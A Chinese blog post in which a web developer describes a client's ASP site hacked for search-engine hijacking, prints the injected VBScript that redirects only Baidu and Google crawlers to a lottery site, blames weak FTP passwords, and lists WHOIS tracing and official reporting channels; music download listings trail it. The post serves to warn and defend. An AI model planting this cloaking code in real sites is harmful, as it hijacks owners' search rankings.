写本篇文章的目的在于揭露一种黑客作弊的手段,也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。
前几日,我的客户电话说自己的百度排名没有了,查询下竟然百度标签显示的内容是一家彩票平台的网站内容。 我知道网站被黑客加入了非法代码,恶意篡改了百度快照。(截图如下)
查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。
1、黑客是如何修改百度快照的呢?
我进行了排查,客户的网站是使用asp源码开发的。发现有个文件被黑客写入了一段代码。
路径:Inc文件夹—SysProduct.asp文件里面最底下添加了如下代码:
<%
function Getbot()
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT")
if instr(1,s_agent,"googlebot",1) > 0 then
GetBot="google"
end if
if instr(1,s_agent,"baiduspider",1) > 0 then
GetBot="baidu"
end if
end function
if GetBot="baidu" or GetBot="google" then
'
Response.Redirect "http://*********"(跳转的网站,引导百度抓取的内容)
else
'
Response.Write""
end if
%>
黑客设置的这串代码导致百度爬虫抓取网页的时候,直接抓取越过客户网站抓取了跳转网站内容,导致百度快照里面显示的是别的内容。使得客户本来排名首页的网站直接被百度屏蔽了。造成了客户很大的损失。
2、那么黑客是如何进入后台的呢?
黑客要进入后台,必须知道FTP账户和密码,以及IP地址。
造成的原因有如下几种:
1)一方面是FTP密码设置的时候比较简单化,很容易被利用软件破解掉,
2)另一方面选择便宜的空间也是一种隐患。因为空间IP以及用户名是很难被知道的,除非有人提供。
3、网站被黑之后,你如何追查黑客的来源?
方法比较简单,就是查询你跳转的目标网站的域名信息。一般情况下,都是一些小型的站长开发的赚钱网站,通过查询域名信息你可以获知该域名的归属人是谁,他有可能就是黑你网站的人。
如果是比较大型的网站利用外包的方式进行推广,那么你也可以得知负责人,给百度或者是网络警察举报一下,该网站存在恶意攻击修改内容的行为,毕竟它也有一定得责任。
通过中国万网Whois域名查询:比如我客户跳转的彩票网站的域名信息如下:
1)第一个是:注册人
2)第二个是:联系电话
3)第三个是:联系邮箱
基本上你联系注册人就可以解决问题。如果对你客户造成的损失太大的话,建议你通过以下方式进行维权:
违法和不良信息举报中心:http://net.china.cn/
12321网络不良与垃圾信息举报受理中心:http://www.12321.cn/
国家互联网应急中心网络安全举报中心:http://www.cert.org.cn/
中国反钓鱼网站联盟认定及处理流程: http://www.cnnic.cn/
公安部信息网络安全报警网站:http:// http://www.cnnic.cn/
中国扫黄打非网:http://www.shdf.gov.cn/
北京市公安局网络违法犯罪举报网站:http://www.bj.cyberpolice.cn/index.jsp
希望本篇文章对你防黑有帮助。
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
更新日志
- 小骆驼-《草原狼2(蓝光CD)》[原抓WAV+CUE]
- 群星《欢迎来到我身边 电影原声专辑》[320K/MP3][105.02MB]
- 群星《欢迎来到我身边 电影原声专辑》[FLAC/分轨][480.9MB]
- 雷婷《梦里蓝天HQⅡ》 2023头版限量编号低速原抓[WAV+CUE][463M]
- 群星《2024好听新歌42》AI调整音效【WAV分轨】
- 王思雨-《思念陪着鸿雁飞》WAV
- 王思雨《喜马拉雅HQ》头版限量编号[WAV+CUE]
- 李健《无时无刻》[WAV+CUE][590M]
- 陈奕迅《酝酿》[WAV分轨][502M]
- 卓依婷《化蝶》2CD[WAV+CUE][1.1G]
- 群星《吉他王(黑胶CD)》[WAV+CUE]
- 齐秦《穿乐(穿越)》[WAV+CUE]
- 发烧珍品《数位CD音响测试-动向效果(九)》【WAV+CUE】
- 邝美云《邝美云精装歌集》[DSF][1.6G]
- 吕方《爱一回伤一回》[WAV+CUE][454M]